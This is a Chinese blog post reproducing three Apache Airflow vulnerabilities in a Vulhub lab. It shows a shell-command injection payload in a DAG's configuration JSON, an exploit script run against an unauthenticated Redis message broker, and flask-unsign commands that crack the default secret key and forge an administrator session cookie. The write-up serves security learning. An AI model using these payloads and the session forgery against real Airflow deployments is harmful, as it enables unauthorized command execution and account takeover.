Vulhub——Airflow

最新推荐文章于 2024-09-08 16:09:02 发布
最新推荐文章于 2024-09-08 16:09:02 发布
阅读量524 收藏 16
点赞数 6
分类专栏: vulhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/139119875
版权

文章目录

一、CVE-2020-11978(示例DAG命令注入)

Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。

启动环境

#初始化数据库
docker-compose run airflow-init

#启动服务
docker-compose up -d

访问1922.168.92.6:8080/admin,可以看到airflow管理端,并将example_trigger_target_dag前面的Off改为On
在这里插入图片描述

再点击执行按钮,在Configuration JSON中输入:{"message":"'\";touch /tmp/airflow_dag_success;#"},再点Trigger执行dag:
在这里插入图片描述

可以看到执行成功~
在这里插入图片描述

查看容器中是否成功创建文件

docker compose exec airflow-worker ls -l /tmp

在这里插入图片描述
在这里插入图片描述

二、CVE-2020-11981(Celery 消息中间件命令执行)

Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。

利用这个漏洞需要控制消息中间件,Vulhub环境中Redis存在未授权访问。通过未授权访问,攻击者可以下发自带的任务airflow.executors.celery_executor.execute_command来执行任意命令,参数为命令执行中所需要的数组。

我们可以使用exploit_airflow_celery.py这个小脚本来执行命令touch /tmp/airflow_celery_success

pip install redis
python exploit_airflow_celery.py 192.168.92.6

在这里插入图片描述

docker exec 52f9 ls -l /tmp # 查看是否成功创建文件

在这里插入图片描述

三、CVE-2020-17526(默认密钥导致的权限绕过)

Apache Airflow是一款开源的,分布式任务调度框架。默认情况下,Apache Airflow无需用户认证,但管理员也可以通过指定webserver.authenticate=True来开启认证。
其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。

访问登录界面会返回cookie

curl -v http://localhost:8080/admin/airflow/login

在这里插入图片描述

使用flask-unsign这个工具来爆破签名时使用的SECRET_KEY

pip3 install flask-unsign[wordlist] # 安装flask-unsign
flask-unsign -u -c eyJjc3JmX3Rva2VuIjoiNzJiMGZiMzAzMGYzMGY4N2Y0ZGM0YWQ3NWY4YmZmYTM2MDEyODM0OSJ9.Zk2e6Q.88HwOH08CYz6rCMSIsBUm55vLp4 # 爆破签名密钥

在这里插入图片描述
成功爆破出Key是temporary_key。使用这个key生成一个新的session,其中伪造user_id为1:

flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"

在这里插入图片描述
将cookie值替换为刚刚生成的cookie再访问。
在这里插入图片描述
成功绕过登录检测,但是此时cookie值发生了改变,就是不是我们生成的那个cookie了。
在这里插入图片描述

PT_silver
关注
专栏目录
简单的Apache AirflowCVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1620
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
SS00016.PBpositions——|Hadoop&PB级离线数仓.v03|——|Airflow.v03|禁用默认的DAG任务|
yanqi_vip
04-17 183
一、Airflow.UI界面概述 ### --- Airflow.UI界面概述 ~~~ Trigger Dag:人为执行触发 ~~~ Tree View:当dag执行的时候,可以点入,查看每个task的执行状态(基于树状视图)。 ~~~ 状态:success、running、failed、skipped、retry、queued、no sta...
Vulhub Apache AirflowCVE-2020-11978
最新发布
2301_81525518的博客
09-08 347
再点击执行按钮,在Configuration JSON中输入:{"message":"'\";运行完,可以看到成功反弹shell,可以命令执行了。来到目录下初始化数据库。
CVE-2024-39877:Apache Airflow 任意代码执行
weixin_47075747的博客
08-07 911
在本次分析中,我们发现了 CVE-2024-39877 漏洞,该漏洞允许经过身份验证的 DAG 作者利用 doc_md 参数在调度程序上下文中执行任意代码,从而违反 Airflow 的安全模型。存在漏洞的代码中的 get_doc_md 方法会初始化 Jinja2 环境,如果 doc_md 字符串不是以 .md 结尾,则直接根据该字符串创建模板,从而在未经过充分清理的情况下呈现模板。在 Apache Airflow 中,DAG 是您要运行的所有任务的集合,以反映其关系和依赖关系的方式组织。
Airflow dag中的命令注入漏洞(CVE-2020-11978)
m0_49025459的博客
10-31 199
进入CVE-2020-11978目录下,依次使用接下来的命令启动靶场访问漏洞地址:http://ip:8080 即可。
Apache Airflow 命令注入 (CVE-2020-11978)漏洞复现
weixin_56537388的博客
11-08 193
Apache Airflow 是一个开源的分布式任务调度框架。在 1.10.10 之前的版本中,示例 DAG 中存在一个命令注入漏洞,该漏洞导致攻击者在工作进程中执行任意命令。
信息安全专业全国院校排名(非常全面),收藏这一篇就够了
Python_0011的博客
05-02 1002
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。信息安全专业国家级一流本科专业大学。
常用环境部署(五)——Docker部署airflow和Centos安装Python3.5
wd520521的博客
06-05 1351
Docker部署airflow和Centos安装Python3.5
SS00015.PBpositions——|Hadoop&PB级离线数仓.v02|——|Airflow.v02|修改默认时区|
yanqi_vip
04-17 237
一、修改时区 ### --- 修改时区 ~~~ Airflow默认使用UTC时间,在中国时区需要用+8小时。 ~~~ 将UTC修改为中国时区,需要修改Airflow源码。 ### --- 在修改 $AIRFLOW_HOME/airflow.cfg 文件 (env) [root@hadoop02 ~]# vim /opt/yanqi/servers/airflow...
airflow-exporter:Airflow插件可将dag和基于任务的指标导出到Prometheus
05-11
将基于dag和任务的指标从Airflow公开到Prometheus兼容端点。 与Airflow版本的兼容性 > = 2.0 当前版本与Airflow 2.0+兼容 <= 1.10.14,> = 1.10.3 兼容v1.3.2 注意:带有Python 3.8用户的Airflow 1.10.14 您...
airflow-code-editor:Apache Airflow的插件,可让您在浏览器中编辑DAG
04-27
您可以在[code_editor]部分中添加以下任何设置来编辑airflow.cfg 。 git_cmd git命令(可选路径) git_default_args git参数添加到每个调用中(默认值:-c color.ui = true) git_author_name作者/提交者中易于...
Apache Airflow Provider Sqoop 模块远程代码执行漏洞
murphysec的博客
03-01 387
Apache Airflow 是一个以编程方式管理 workflow 的平台,Sqoop 模块用于在 Hadoop 和结构化数据存储(例如关系数据库)之间高效传输大量数据。 apache-airflow-providers-apache-sqoop 3.1.1 之前版本中,由于 SqoopHook 类创建 sqoop 连接时未对用户配置的 jar 文件进行过滤,有权修改 sqoop 连接配置(lib_jars 字段)的攻击者可上传恶意 jar 文件远程执行恶意代码。
Apache Airflow Docker Provider远程代码执行漏洞
bocco的博客
08-17 396
安全狗应急响应中心监测到,Apache发布安全公告,修复了Apache Airflow Docker Provider中的一个远程代码执行漏洞,漏洞编号:CVE-2022-38362。
CVE-2022-24288:Apache Airflow OS命令注入漏洞复现
热爱学习,喜欢折腾!
08-24 1987
在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。............
漏洞复现——Apache Airflow 示例dag中的命令注入(CVE-2020-11978
m0_65149086的博客
05-26 473
懵逼日常
OSCS开源安全周报第 56 期:Apache Airflow Spark Provider 任意文件读取漏洞
OSCS开源安全社区
08-21 1979
OSCS 社区共收录安全漏洞 3 个,公开漏洞值得关注的是 Apache NiFi 连接 URL 验证绕过漏洞(CVE-2023-40037)、PowerJob 未授权访问漏洞(CVE-2023-36106)、Apache Airflow Spark Provider 任意文件读取漏洞(CVE-2023-40272) 针对 NPM 、PyPI 仓库,共监测到 81 个不同版本的毒组件,其中 NPM 组件包 mall-front-babel-directive 等携带远控木马,该系列的组件包具有持续性威胁行为
airflow CVE-2020-11978 漏洞分析
示例和笔记
06-08 560
CVE-2020-11978漏洞的一个示例是发现在Apache Airflow的示例dag文件中存在命令注入漏洞。攻击者可以通过该漏洞在Airflow服务器上执行恶意命令。具体来说,该漏洞源于示例dag文件中的一个BashOperator任务,它执行了一个echo命令并将输出写入文件。该任务通过 {{ ds }} 参数接收当前日期作为参数,并在命令行上执行。然而,该任务并没有对 ds 参数进行严格的验证和过滤,因此攻击者可以通过注入恶意命令来执行任意命令。
漏洞预警|Apache Airflow Hive Provider命令注入漏洞
LJQClqjc的博客
11-22 786
棱镜七彩安全预警
漏洞分析|Apache Airflow Pinot Provider 命令注入漏洞
LJQClqjc的博客
11-23 526
棱镜七彩漏洞深度分析
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值